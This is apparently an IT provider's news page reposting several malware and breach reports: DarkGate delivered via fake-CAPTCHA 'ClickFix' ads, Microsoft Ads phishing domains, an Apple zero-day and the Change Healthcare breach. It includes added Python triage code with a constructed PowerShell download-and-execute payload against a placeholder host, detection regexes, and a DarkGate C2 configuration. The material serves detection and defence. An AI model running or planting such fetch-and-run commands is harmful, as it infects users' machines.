IT News

Explore the MakoLogics IT News for valuable insights and thought leadership on industry best practices in managed IT services and enterprise security updates.

ClickFix vs. traditional download in new DarkGate campaign

During the past several months there have been numerous malware campaigns that use a technique sometimes referred to as “ClickFix”. It usually consists of a fake CAPTCHA or similar traffic-validation page that instructs visitors to paste and execute code in order to proceed.

We have started to see ClickFix attacks more and more via malicious Google ads as well. This is in contrast to typical phishing pages where victims download a so-called installer that contains malware.

In a recent malvertising campaign targeting the Notion brand, we observed both techniques in play. It’s quite possible the threat actors were collecting metrics to determine which of the two gave them the most conversions, i.e. successful malware installs.

This blog post details this campaign that ultimately delivered the DarkGate malware loader.

Overview

[Image: campaign overview]

Web traffic view

[Image: web traffic view]

Delivery #1: PowerShell code via “ClickFix”

Malicious ad and social engineering

Threat actors created a Google ad for the popular utility application Notion. The first time we clicked on the ad, we were redirected to a site showing a “Verify you are human” page, also known as a Cloudflare Turnstile. Except this was not the real Cloudflare, merely a social engineering trick.


The HTML source code was obfuscated so that it showed only gibberish interlaced with Russian comments; we later determined the gibberish was Rot13, a simple letter-substitution cipher. This was likely used to hide the offending code from prying eyes and from network detection rules:


After checking the box to verify we are human, we see new instructions, “Verification steps”, that involve pressing a series of key combinations. Windows + R launches the Run dialog, while Ctrl + V pastes whatever is in the clipboard. The pasted code is presented as part of the verification process, but when the victim presses Enter, they actually run a malicious command:


PowerShell and payload

The code copied into the clipboard is actually a command line that runs PowerShell:


The Base64 encoded string retrieves the following code from hxxps[:]//s2notion[.]com/in.php?action=1:

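As an added example that is not part of the original post: a small Python triage helper for the two obfuscation layers described above, the Rot13-rotated page source and the Base64-encoded PowerShell command that the page copies to the clipboard. The page source, the command line and the host example.invalid are constructed inside the script for illustration; the campaign's real script and payload are not reproduced.

```python
"""Triage helpers for a ClickFix-style lure: unhide Rot13-rotated page source
and decode the PowerShell -EncodedCommand argument the page puts on the clipboard."""
import base64
import codecs
import re
from typing import Dict, List, Optional

# --- constructed sample, not the campaign's real page or payload -------------
# The clipboard payload: a PowerShell one-liner that fetches and runs remote text.
# example.invalid is a placeholder host.
_INNER_COMMAND = "iex (irm https://example.invalid/in.php?action=1)"
# powershell -EncodedCommand expects Base64 of the UTF-16LE bytes, not UTF-8.
_ENCODED = base64.b64encode(_INNER_COMMAND.encode("utf-16-le")).decode("ascii")
SAMPLE_CMDLINE = f"powershell -w hidden -nop -ep bypass -enc {_ENCODED}"
_SCRIPT = f'<script>navigator.clipboard.writeText("{SAMPLE_CMDLINE}");</script>'
# Rot13 rotates only A-Z/a-z, so the Cyrillic comment survives while the
# script turns into the "gibberish" that a raw grep for "powershell" misses.
SAMPLE_HTML = "<!-- проверка -->\n" + codecs.encode(_SCRIPT, "rot13") + "\n"


def unhide_rot13(html: str) -> str:
    """Rot13 is its own inverse: one pass recovers the hidden script."""
    return codecs.decode(html, "rot13")


_CLIP_RE = re.compile(r'clipboard\.writeText\("([^"]*)"\)')


def clipboard_commands(html: str) -> List[str]:
    """Strings handed to the clipboard API, in the raw and the Rot13-unhidden source."""
    found: List[str] = []
    for variant in (html, unhide_rot13(html)):
        found.extend(_CLIP_RE.findall(variant))
    return found


_ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
_INDICATORS = {
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "execution policy bypass": re.compile(r"-e(?:xecution)?p(?:olicy)?\s+bypass", re.I),
    "encoded command": _ENC_RE,
    "download cradle": re.compile(
        r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|downloadfile|net\.webclient)\b",
        re.I),
    "runs fetched text": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
}
_URL_RE = re.compile(r"https?://[^\s'\")]+")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Plaintext of a -EncodedCommand argument, or None if absent or malformed."""
    match = _ENC_RE.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def defang(url: str) -> str:
    """Render a URL the way the IOC section does, so it cannot be clicked by accident."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def triage(cmdline: str) -> Dict[str, object]:
    """Decode the command line and report which ClickFix traits it carries."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else f"{cmdline}\n{decoded}"
    return {
        "decoded": decoded,
        "indicators": [name for name, rx in _INDICATORS.items() if rx.search(text)],
        "urls": [defang(u) for u in _URL_RE.findall(text)],
    }


if __name__ == "__main__":
    for cmd in clipboard_commands(SAMPLE_HTML):
        print(triage(cmd))
```

In an investigation the command line comes from the victim's Run dialog history (the RunMRU key under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer) or from process-creation telemetry; the same indicator list is what a detection rule for powershell.exe launched from explorer.exe with a hidden window and an encoded command would key on.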

This downloads a binary from hxxps[:]//s2notion[.]com/in.php?action=2 and runs it. That file contains an AutoIt script that is launched with:

"c:\temp\test\Autoit3.exe" c:\temp\test\script.a3x

The following DarkGate configuration was extracted from it:

{'DarkGate': {'C2': [['155.138.149.77']], 'unknown_8': ['No'], 'name': ['DarkGate'], 'unknown_12': ['R0ijS0qCVITtS0e6xeZ'], 'unknown_13': ['6'], 'unknown_14': ['Yes'], 'port': ['80'], 'startup_persistence': ['Yes'], 'unknown_32': ['No'], 'check_display': ['Yes'], 'check_disk': ['No'], 'min_disk_size': ['100'], 'check_ram': ['No'], 'min_ram_size': ['4096'], 'check_xeon': ['No'], 'unknown_21': ['No'], 'unknown_23': ['Yes'], 'unknown_31': ['No'], 'unknown_24': ['N-traff'], 'campaign_id': ['user1'], 'unknown_26': ['No'], 'xor_key': ['sDcGdADE'], 'unknown_28': ['No'], 'unknown_29': ['2'], 'unknown_35': ['No'], 'tabla': ['a2THNyA]7u6Kiv$8k.F*ZrO"do1wL9P0 3}eCGDY{XVzctg,&EhJfsx=n)mpQUqljIW5SRMb4B([']}}

Delivery #2: signed executable

Malicious ad and decoy site

We saw this scenario after revisiting the malicious ad a second time. Notice how the URL path now includes “/download/”.


This is the more traditional approach to malvertising for software downloads that we’ve seen for a while now: victims download an executable after being tricked by a lookalike site. The file was hosted on GitHub under the user profile herawtisabela1992:


This fake Notion installer was digitally signed (now revoked) by KDL CENTRAL LIMITED. Similar to the other binary mentioned in the first delivery technique, this one also extracts an AutoIt payload, with the same DarkGate configuration.

It’s interesting to note that the same GitHub user account previously distributed a backdoor called Warmcookie (aka Badspace) from:

raw[.]githubusercontent[.]com/herawtisabela1992/check/refs/heads/main/920836164_x64.exe

Conclusion

We were not surprised to see the ClickFix social engineering attack here, but what made this campaign interesting was that it alternated between ClickFix and the typical file download.

It’s quite likely someone is tracking stats and comparing numbers to see which of the two delivery methods yields the most successful installs. If we had to put our money on it, we would bet that ClickFix is ahead. The file download technique remains effective, especially if the payload is digitally signed, but it could be relegated to second place in the near future.

Malwarebytes detects both payloads as Trojan.Dropper and Backdoor.DarkGate.


We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Indicators of Compromise

Malvertising infrastructure

notionbox[.]org
s2notion[.]com

Payloads

6b6676267c70fbeb3257f0bb9bce1587f0bdec621238eb32dd9f84b2bcd7e3ea
4fe8bbc88d7a8cc0eec24bd74951f1f00b5127e3899ae53de8dabd6ff417e6db

Cybercrime gets a few punches on the nose

It’s not often that we get to share good news, so we wanted to take this opportunity to showcase some progress made by law enforcement against cybercrime.

Europol notified us about the take-down of two of the largest cybercrime forums in the world. With over 10 million users, Nulled and Cracked serviced cybercriminals from all over the world with a quick entry point into the cybercrime scene.

On the forums people not only discussed how to optimize their cybercrime efforts but also provided several cybercrime-as-a-service options, including data, malware, and hacking tools.

Law enforcement agencies not only seized the forums but also managed to take down associated services like the money launderer Sellix and a “bulletproof” hosting service called StarkRDP, which enjoyed heavy promotion on both platforms and operated under the same suspects.

Bulletproof hosting refers to web hosting services that cater specifically to cybercriminals by allowing them to host illegal activities and content. These hosting providers promise anonymity, operate with very few rules, and typically ignore requests from law enforcement to remove harmful or illegal material.

These two forums also offered AI-based tools and scripts to automatically scan for security vulnerabilities and optimize attacks.

This operation was an international effort supported by Europol and the Federal Bureau of Investigation (FBI) involving law enforcement from Australia, France, Germany, Greece, Italy, Spain, and Romania.

In a separate action, Dutch police and the US Department of Justice (DOJ) dismantled an international cybercrime network called HeartSender (aka Saim Raza or The Manipulators). This crime network specializes in developing and selling phishing kits. Their tools to power spam campaigns attracted thousands of customers interested in sending vast amounts of phishing emails, stealing login credentials, and exploiting compromised systems.

Law enforcement seized a total of 39 domains and servers belonging to HeartSender in an international effort. The law enforcement agencies remotely disabled the illegal software sold through these servers. On the servers the police also found datasets including millions of victim records.

They also found buyer records, which will be the subject of a follow-up operation. Operations like HeartSender, Nulled, and Cracked make cybercrime accessible to aspiring criminals who have no working knowledge of programming or other computer skills. As always, we’ll have to wait and see how effective such actions are in the long run. As we all know, these “enablers” have a tendency to grow back in other places; they care about neither their customers nor their victims, only their Bitcoin wallets. But for now, it will take them some time to get back in action, time they can’t spend defrauding innocent victims.



Microsoft advertisers phished via malicious Google ads

Just days after we uncovered a campaign targeting Google Ads accounts, a similar attack has surfaced, this time aimed at Microsoft advertisers. These malicious ads, appearing on Google Search, are designed to steal the login information of users trying to access Microsoft’s advertising platform.

Microsoft does purchase ad space on its rival’s dominant search engine; however, we found Google sponsored results for “Microsoft Ads” (formerly known as Bing Ads) that contained malicious links created by impostors.

Through shared artifacts, we were able to identify additional phishing infrastructure targeting Microsoft accounts going back at least a couple of years. We have reported these incidents to Google.

Microsoft made an estimated $12.2 billion in search and news advertising revenues (including Bing) in 2023, which pales in comparison to its rival, Google, holding a much larger share of the search engine market.

Since the advertising ecosystem allows for an open competition between brands, Microsoft is trying to get traffic and earn clicks from Google searches. During our investigation, we saw sponsored results for Microsoft Ads and Bing Ads that managed to slip through Google’s security checks:

Figure 1: A Google search for ‘microsoft ads’

Redirection, cloaking and Cloudflare

The threat actors are using different techniques to evade detection and drop traffic from bots, security scanners and crawlers. Unwanted IP addresses (e.g. VPNs) are immediately redirected to a bogus marketing website (Figure 2). This is also known as a “white page”, meaning it looks innocent and hides its maliciousness.

Figure 2: Cloaking page

Users that appear to be genuine are presented with a Cloudflare challenge to verify they are human. This is a legitimate instance of Cloudflare, unlike the “ClickFix” type of attack that has become very commonplace and tricks people into pasting and executing malicious code.

Figure 3: Cloudflare verification

Rickroll for the cheaters

After a successful Cloudflare check, users are redirected to the final phishing page via a special URL that acts as an entry point for the malicious domain ads[.]mcrosoftt[.]com. You can see the network requests for this redirection chain in Figure 4 below.

Figure 4: Network traffic for full redirection

If you were to visit that domain directly instead of going through the proper ad click, you’d be greeted with a rickroll, an internet meme designed to make fun of someone. The web sandbox urlscan.io has several examples of crawl requests for URLs on that server (37.120.222[.]165) that all ended at the rickroll.

Figure 5: Rickroll redirect

Phishing page

After much subversion, real victims finally see the phishing page for the Microsoft Advertising platform. The full URL in the address bar is meant to imitate the legitimate one (ads.microsoft.com).

Figure 6: Microsoft Advertising phishing page

The phishing page shows users a fake error message enticing them to reset their password, and it seemingly tries to get past 2-Step verification as well. Handling 2FA has become a standard feature in most phishing kits, due to the rise in user adoption of this additional security layer.

Figure 7: Phishing steps

Larger campaign

Going back to urlscan.io, we fed it the special entry URL and it was able to navigate to the phishing page. From there, we can look at the various web requests and find something to pivot on in order to identify additional infrastructure.

The favicon.ico file is one starting point and we can query for any scans that match its hash, excluding the official Microsoft domain. The results show that in the past week, there were several other domains that appear to be related to the theft of Microsoft Ads accounts.

But this campaign appears to go back further at least a couple of years and maybe more, although it becomes somewhat tricky to know if the malicious infrastructure is tied to the same threat actors. It’s worth noting that several of the domains are either hosted in Brazil or have the ‘.com.br‘ Brazilian top-level domain.

What we discovered may only be the tip of the iceberg; by starting to investigate compromised advertiser accounts we may very well have opened Pandora’s box. This isn’t only Google or Microsoft ad accounts we are talking about, but potentially for Facebook, and many others. Of course, our scope so far has been Google Search, but we know that other platforms are rife with such phishing attacks.

These recent malvertising campaigns highlight the ongoing threat of phishing through online advertising. While tech companies like Google work to combat these issues, users must remain vigilant. Here are some key steps you can take to protect yourself:

  • Verify URLs: Always carefully examine the URL in your browser’s address bar before entering any credentials. Scrutinize URLs for inconsistencies or misspellings.
  • Use 2-Step verification wisely: it adds an extra layer of security to your accounts, but you still need to pay attention to requests before granting them access.
  • Regularly monitor your accounts: Check your advertising accounts for any suspicious activity such as changes in administrator accounts.
  • Report ads: If you encounter a suspicious ad, report it for the benefit of other users.


Indicators of Compromise

The following IOCs consist of domains that shared attributes with our initial phishing page, including the favicon and images. Some of them go back further but are provided for threat hunters who may wish to investigate these campaigns further.

30yp[.]com
aboutadvertselive[.]com
aboutblngmicro[.]cloud
account-microsoft[.]online
account-microsoft[.]site
account-mircrosoft-ads[.]com
account[.]colndcx-app[.]com
accounts-ads[.]site
accounts-mircrosoft-ads[.]online
acount-exchang[.]store
admicrosoft[.]com
admicrsdft[.]com
ads-adversitingb[.]com
ads-dsas[.]site
ads-microsoft[.]click
ads-microsoft[.]coachb-learning[.]com
ads-microsoft[.]live
ads-microsoft[.]lubrine[.]com[.]br
ads-microsoft[.]online
ads-microsoft[.]shop
ads-microsoftz[.]online
ads-miicrosoft[.]com
ads-mlcrosft[.]com
ads-mlcrosoft-com[.]blokchaln[.]com
ads[.]microsoft[.]com[.]euroinvest[.]ge
ads[.]mlcr0soft[.]com
ads[.]mlcrosoft[.]com[.]ciree[.]com[.]br
ads[.]mlcrosoft[.]com[.]poezija[.]com[.]hr
ads[.]rnlcrosoft[.]com[.]euroinvest[.]ge
adslbing[.]com
adsmicro[.]exchangefastex[.]cloud
adsmicrosoft[.]shop
adsverstoni[.]com
advertiseliveonline[.]com
advertising-bing[.]site
advertising-mlcrosoft[.]org
adverts2023[.]online
advertsingsinginbing[.]com
agency-wasabi[.]com
app[.]beefylswap[.]top
bîlkub[.]com
bing-ads[.]com
bing[.]login-acount[.]me
bitmax-us[.]com
blngad[.]online
blseaccount[.]cloud
bltrue[.]colnhouse-fr[.]us
côinlíst[.]online
colneex-plalform[.]cloud
connec-exchan[.]site
digitechmedia[.]agency
forteautomobile[.]com
global-verifications[.]com
global-verify[.]com
homee-acount[.]com
itlinks[.]com[.]cn
krakeri-login[.]com
login-adsmicrosoft[.]helpexellent[.]com
login[.]adsadvertising[.]online
login[.]microsofttclicks[.]live
micrasofit[.]xyz
microosft[.]accounts-ads[.]site
microsoft-ads[.]website
microsoftadss[.]com
microsoftadversiting[.]cloud
microsoftbingads[.]com
microsofyt[.]adversing-publicidade[.]pro
mictrest[.]mnws[.]ru
mlcrosoft-bing-acces[.]click
mlcrosoftadvertlsing[.]online
mudinhox[.]site
ndnet[.]shop
phlyd[.]com
portfoliokrakenus[.]com
portfoliolkraken[.]com
portfoliopro-us[.]com
portfolioskranen[.]com
portofolioprospots[.]com
potfoliokeiolenen[.]com
potfoliokelaken[.]com
potfoliokelaneken[.]com
potfoliokenaiken[.]com
potfoliokenkren[.]com
potfolioketonelen[.]com
potfolioskaneken[.]com
potfolioskenaken[.]com
potfolioskraineken[.]com
potfolioskranaken[.]com
potfolioskraneken[.]com
pro-digitalus[.]com
prokrakenportfolio[.]com
rnlcrosoft[.]smartlabor[.]it
sig-in-mlcrosoft-advertisings[.]site
uiiadvertise[.]online
wvvw-microsoft[.]xyz
www-bingads[.]com
www-microsoftsads[.]com
www-v[.]userads[.]digital
www34[.]con-webs[.]com
www55[.]con-webs[.]com

ads-microsoft[.]bewears[.]com
ads[.]msicrosoft[.]com
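As an added example, not part of the original post: a Python helper that turns the “scrutinize URLs for inconsistencies or misspellings” advice above into a check you can run over a defanged list such as the one just given. It folds the substitutions visible in the list (rn for m, l or 1 for i, 0 for o, accented vowels) and measures edit distance to a short brand list. The brand list, the official-domain allow-list and the sample hosts are my own constructions; the sample copies four entries from the list above and adds two hosts that should not be flagged.

```python
"""Flag brand-lookalike hostnames in a defanged IOC list by folding the
character swaps the list above relies on and measuring edit distance."""
import re
import unicodedata
from typing import Dict, List, Tuple

BRANDS = ["microsoft", "bing", "kraken", "coinlist"]
# Allow-list of genuine registrable domains (illustrative; extend per brand).
OFFICIAL = ["microsoft.com", "bing.com"]
# Swaps seen in the list: rn->m, vv->w, l/1->i, 0->o, plus accented vowels.
_PAIRS = (("rn", "m"), ("vv", "w"))
_CHARS = str.maketrans({"0": "o", "1": "i", "l": "i", "3": "e", "5": "s", "$": "s"})


def refang(host: str) -> str:
    return host.replace("[.]", ".").strip().lower()


def normalize(token: str) -> str:
    """Strip accents (côinlíst -> coinlist) and fold confusable characters."""
    decomposed = unicodedata.normalize("NFKD", token)
    plain = "".join(c for c in decomposed if not unicodedata.combining(c))
    for pair, repl in _PAIRS:
        plain = plain.replace(pair, repl)
    return plain.translate(_CHARS)


def levenshtein(a: str, b: str) -> int:
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def best_distance(token: str, brand: str) -> int:
    """Distance from the brand to the closest brand-sized slice of the token,
    so a misspelled brand buried in a longer label is still found."""
    if len(token) <= len(brand) + 2:
        return levenshtein(token, brand)
    sizes = range(len(brand) - 1, len(brand) + 2)
    return min(levenshtein(token[i:i + n], brand)
               for n in sizes for i in range(len(token) - n + 1))


def is_official(host: str) -> bool:
    return any(host == o or host.endswith("." + o) for o in OFFICIAL)


def flag_lookalikes(defanged_hosts: List[str]) -> Dict[str, List[Tuple[str, str]]]:
    """Map each suspicious host to the (label, brand) pairs that gave it away."""
    hits: Dict[str, List[Tuple[str, str]]] = {}
    folded = {b: normalize(b) for b in BRANDS}
    for raw in defanged_hosts:
        host = refang(raw)
        if is_official(host):
            continue
        for token in re.split(r"[.-]", host):
            t = normalize(token)
            for brand, fb in folded.items():
                # Short brands match only as an exact substring; longer ones
                # tolerate up to two edits, which absorbs typos such as micrasofit.
                if fb in t or (len(fb) >= 6 and best_distance(t, fb) <= 2):
                    hits.setdefault(raw, []).append((token, brand))
                    break
    return hits


# Constructed sample: four entries from the list above, the genuine ads.microsoft.com
# host, and an unrelated placeholder host.
SAMPLE_HOSTS = [
    "ads[.]rnlcrosoft[.]com[.]euroinvest[.]ge",
    "côinlíst[.]online",
    "blngad[.]online",
    "potfoliokelaken[.]com",
    "ads[.]microsoft[.]com",
    "docs[.]example[.]org",
]

if __name__ == "__main__":
    for host, why in flag_lookalikes(SAMPLE_HOSTS).items():
        print(host, why)
```

Name-based scoring only catches brand impersonation; entries in the list above such as forteautomobile[.]com, which were tied to the campaign by a shared favicon and images rather than by their name, pass through unflagged. That is why the post pivots on page artifacts rather than on domain spelling.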

The DeepSeek controversy: Authorities ask where does the data come from and how safe is it?

The sudden rise of DeepSeek has raised concerns and questions, especially about the origin and destination of the training data, as well as the security of the data.

For those returning from a short holiday away from the news, DeepSeek is a new player in the Artificial Intelligence (AI) field. The Chinese startup has certainly taken the app stores by storm: just a week after launch it topped the charts as the most downloaded free app in the US. This caused an upset on the stock markets that cost Nvidia and Oracle shareholders a lot of money.

DeepSeek has been called an open-source project, but this is technically not true, because only the model’s outputs and certain aspects are publicly accessible, which makes it an open-weight model. The important difference is that the underlying training data and the code needed to fully reproduce the models are not disclosed.

And it’s the data that poses a concern to many. OpenAI has accused DeepSeek of using its ChatGPT model to train DeepSeek’s AI chatbot, which triggered quite a few memes, not least because OpenAI itself previously faced accusations of using data that was not its own to train ChatGPT.

[Image: meme captioned “You're trying to kidnap what I've rightfully stolen”]

Authorities have started to ask questions as well. The Italian privacy regulator GPDP has asked DeepSeek to provide information about the data it processes in the chatbot and about its training data. Because it sees a risk to the privacy of millions of Italian citizens, the GPDP has demanded that DeepSeek answer, within 20 days, questions about:

  • Which personal data is collected
  • The origin of the data
  • Purpose for the collection
  • Whether the data is stored on servers in China

According to the Italian press agency ANSA, DeepSeek disappeared on January 29, 2025 from Google and Apple’s app stores in Italy.

And if all that isn’t scary enough, researchers at Wiz have found a publicly accessible database belonging to DeepSeek.

“This database contained a significant volume of chat history, backend data and sensitive information, including log streams, API Secrets, and operational details.”

The database was not only accessible and readable; it also allowed control and privilege escalation within the DeepSeek environment. No authentication was required, so anybody who stumbled upon the database could run queries to retrieve sensitive logs and plaintext chat messages, and even steal plaintext passwords and local files.

Needless to say, this oversight put DeepSeek and its users at risk.

We have said this before and will probably have to repeat it many times: the race to develop quickly in this field is creating privacy risks we have never seen before, simply because security is an afterthought for the developers. So, no matter which AI chatbot you prefer, always be mindful of the information you feed it: it may find its way to unexpected and undesirable places.



These are the 10 worst PIN codes

Australian news outlet ABC NEWS analyzed a data set of 29 million 4-digit PIN numbers that people actually used to secure their devices, ATM withdrawals, building access, and more.

What the outlet discovered is both expected and disappointing: Too many people use insecure PIN codes to protect important parts of their lives.

Now, I feel compelled to add that I’ve always considered a four-digit number simply too short to secure anything important. In the worst case it takes only 10,000 tries, which is not a lot for a determined, and sometimes machine-assisted, attacker.

My (Dutch) bank uses a five-digit number to access the app, although it still uses four digits for payments or to make withdrawals from an ATM. But that might be because that’s how the machines are programmed to work. Also, in those cases, entering the PIN itself could be considered a second factor in a multi-factor authentication (MFA) procedure since you already need to have possession of the card.

That said, ABC’s research shows that many of us are predictable when it comes to picking out our PINs. For example, it should come as no surprise that 0000 is popular since it is the default PIN code for many devices—and apparently many people don’t see the importance of changing it.

Whether this reflects doubt in our own memory or a certain degree of laziness would require a deeper psychological analysis, but as with passwords, people tend to pick easy-to-remember options: the same digit repeated four times, or a predictable sequence such as 1234. They also prefer numbers that are easy to type, like “2580”, which runs straight down the number pad.

[Image: Android keypad showing why 2580 is an easy PIN]
2580 is ranked 28

Other predictable numbers stem from the fact that we use birthdays and birth years so we can easily remember the PIN. This is why we see a lot of PINs that start with 19 (for a year), or where the first digit of a month, either 0 or 1, sits in the first or third position of the code, depending on how you format your dates.

The worrying part is that by trying the top-ranked options in the list, an attacker raises their chances of a breach to 11.7%.

In some cases the attacker may only have five chances, so guess which ones they will be trying.

I have copied the top 10 PIN codes, so you can get an idea of which codes to avoid, or to change if you use one of them.

Ranking  Code  Popularity
1        1234  9.0%
2        1111  1.6%
3        0000  1.1%
4        1342  0.6%
5        1212  0.4%
6        2222  0.3%
7        4444  0.3%
8        1122  0.3%
9        1986  0.3%
10       2020  0.3%

As in many situations, it’s prudent to remember that the option that is easiest to use is almost never the most secure.
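As an added illustration that is not part of the article: a Python checker for the patterns the ranking above makes visible (repeated digits, sequences, keypad lines, years and dates), together with the arithmetic for comparing an attacker who guesses in popularity order against one facing uniformly random PINs. The TOP10 list is copied from the table; the pattern names, the day-of-month simplification and the one-entry keypad line list are my own choices.

```python
"""Pattern checks that catch the kinds of PINs the ranking above shows people
actually choose, plus the arithmetic behind "an attacker with N guesses"."""
from typing import Dict, List, Tuple

# The article's top 10, popularity kept in tenths of a percent to avoid float drift.
TOP10: List[Tuple[str, int]] = [
    ("1234", 90), ("1111", 16), ("0000", 11), ("1342", 6), ("1212", 4),
    ("2222", 3), ("4444", 3), ("1122", 3), ("1986", 3), ("2020", 3),
]
# Straight lines of four keys on a phone keypad (2580 runs down the middle column).
_KEYPAD_LINES = ["2580"]


def _looks_like_date(pin: str) -> bool:
    """MMDD with a plausible month and day (day limit simplified to 31 for every month)."""
    month, day = int(pin[:2]), int(pin[2:])
    return 1 <= month <= 12 and 1 <= day <= 31


def weak_pin_reasons(pin: str) -> List[str]:
    """Every predictable pattern a four-digit PIN matches; an empty list means none of these."""
    if len(pin) != 4 or not pin.isdigit():
        raise ValueError("expected exactly four digits")
    reasons: List[str] = []
    distinct = len(set(pin))
    if distinct == 1:
        reasons.append("single repeated digit")
    elif distinct == 2:
        reasons.append("only two distinct digits")
    digits = [int(c) for c in pin]
    if {b - a for a, b in zip(digits, digits[1:])} in ({1}, {-1}):
        reasons.append("ascending or descending sequence")
    if any(pin in line or pin in line[::-1] for line in _KEYPAD_LINES):
        reasons.append("straight line on the keypad")
    if pin[:2] in ("19", "20"):
        reasons.append("looks like a year")
    if _looks_like_date(pin) or _looks_like_date(pin[2:] + pin[:2]):
        reasons.append("looks like a date (MMDD or DDMM)")
    return reasons


def audit(table: List[Tuple[str, int]] = TOP10) -> Dict[str, List[str]]:
    """Reasons per PIN for a whole table, e.g. to see which top-10 entries a policy would reject."""
    return {pin: weak_pin_reasons(pin) for pin, _ in table}


def guess_success_rate(guesses: int, table: List[Tuple[str, int]] = TOP10) -> float:
    """Percent of the data set covered by trying the `guesses` most popular PINs in order."""
    return sum(share for _, share in table[:guesses]) / 10


def uniform_success_rate(guesses: int) -> float:
    """Same attacker against PINs chosen uniformly at random from the 10,000 possibilities."""
    return guesses * 100 / 10_000


if __name__ == "__main__":
    for pin, why in audit().items():
        print(pin, why or "no simple pattern")
    print(guess_success_rate(5), "% vs", uniform_success_rate(5), "% for five guesses")
```

Note that 1342, fourth in the ranking, matches none of these rules; popularity lists catch what pattern rules miss, which is why a lockout after a handful of attempts matters more than any single rejection rule.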

Apple users: Update your devices now to patch zero-day vulnerability

Apple has released a host of security updates across many devices, including for a zero-day bug which is being actively exploited in iOS.

Apple said:

“A malicious application may be able to elevate privileges. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 17.2.”

Devices affected are those that run:

  • iPhone XS and later
  • iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later
  • macOS Sequoia
  • Apple Watch Series 6 and later
  • All models of Apple TV HD and Apple TV 4K

If you use any of these then you should install updates as soon as you can. To check if you’re using the latest software version, go to Settings (or System Settings) > General > Software Update. It’s also worth turning on Automatic Updates if you haven’t already, which you can do on the same screen.

[Image: iPadOS 18.3 ready to update]

Technical details about the zero-day

The zero-day vulnerability patched in this update is tracked as CVE-2025-24085. It is described as a use after free (UAF) issue in Apple’s Core Media framework that would allow an attacker to elevate privileges.

The Core Media framework handles multimedia for applications such as photos, videos, and real-time communication. A UAF is a type of vulnerability that results from incorrect handling of dynamic memory while a program runs: if the program frees a memory location but does not clear its pointer to it, that dangling pointer can later be used to manipulate the program. Referencing memory after it has been freed can cause a program to crash, use unexpected values, or execute code. In this case, successful exploitation could give a malicious app privileges on the affected device that it shouldn’t have.



UnitedHealth almost doubles victim numbers from massive Change Healthcare data breach

UnitedHealth says it now estimates that the data breach on its subsidiary Change Healthcare affected 190 million people, nearly doubling its previous estimate from October.

In May, UnitedHealth CEO Andrew Witty estimated that the ransomware attack compromised the data of a third of US individuals when he testified before the Senate Finance Committee on Capitol Hill. In October, this was largely confirmed when Change Healthcare reported a number of 100,000,000 affected individuals.

Besides the enormous number of victims, the story behind this ransomware attack is also very complex, because of the cybercriminals involved and how the first group that received the ransom payment disappeared without paying their affiliates.

The ALPHV/BlackCat ransomware group claimed the initial attack. The UnitedHealth Group reportedly paid $22 million to receive a decryptor and to prevent the attackers from publicly releasing the stolen data.

But shortly after the payment, ALPHV disappeared in an unconvincing exit scam designed to make it look as if the group’s website had been seized by the FBI, forgetting to pay its affiliates in the process. A month later, newcomer ransomware group RansomHub listed Change Healthcare as a victim on its own website, claiming to have the data that ALPHV stole.

According to BleepingComputer, the original attackers joined forces with RansomHub and never deleted the data. A few days later, the listing on the RansomHub leaks site disappeared, which usually means someone paid the ransom.

Stolen information

The data breach at Change Healthcare is the largest healthcare data breach in US history. Although Change Healthcare provided details about the types of medical and patient data that was stolen, it can’t provide exact details for every individual. However, the exposed information may include:

  • Contact information: Names, addresses, dates of birth, phone numbers, and email addresses.
  • Health insurance information: Details about primary, secondary, or other health plans/policies, insurance companies, member/group ID numbers, and Medicaid-Medicare-government payor ID numbers.
  • Health information: Medical record numbers, providers, diagnoses, medicines, test results, images, and details of care and treatment.
  • Billing, claims, and payment information: Claim numbers, account numbers, billing codes, payment card details, financial and banking information, payments made, and balances due.
  • Other personal information: Social Security numbers, driver’s license or state ID numbers, and passport numbers.

Change Healthcare added:

“The information that may have been involved will not be the same for every impacted individual. To date, we have not yet seen full medical histories appear in the data review.”

Protecting yourself after a data breach

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

  • Check the vendor’s advice. Every breach is different, so check with the vendor to find out what’s happened and follow any specific advice they offer.
  • Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
  • Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
  • Watch out for fake vendors. The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify the identity of anyone who contacts you using a different communication channel.
  • Take your time. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
  • Consider not storing your card details. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
  • Set up identity monitoring. Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

Check your digital footprint

Malwarebytes has a free tool for you to check how much of your personal data has been exposed online. Submit your email address (it’s best to give the one you most frequently use) to our free Digital Footprint scan and we’ll give you a report and recommendations.

A week in security (January 20 – January 26)

Three privacy rules for 2025 (Lock and Code S06E02)

This week on the Lock and Code podcast…

